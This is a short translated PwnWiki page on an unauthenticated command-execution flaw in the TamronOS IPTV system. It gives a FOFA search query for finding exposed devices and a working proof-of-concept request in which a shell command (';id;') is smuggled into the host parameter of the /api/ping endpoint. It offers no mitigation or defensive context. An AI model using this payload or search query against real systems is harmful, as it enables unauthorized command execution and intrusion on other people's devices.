TamronOS IPTV system front-end command execution vulnerability

From PwnWiki
This page is a translated version of the page TamronOS IPTV系統前台命令執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

Vulnerability Impact

TamronOS IPTV All

FOFA

title="TamronOS IPTV系统"

POC

 /api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp

Then use the POC to go to the foreground (not logged in state) to try to execute the command.

2iptv.png

Retrieved from "https://pwnwiki.com/index.php?title=TamronOS_IPTV系統前台命令執行漏洞/en&oldid=5630"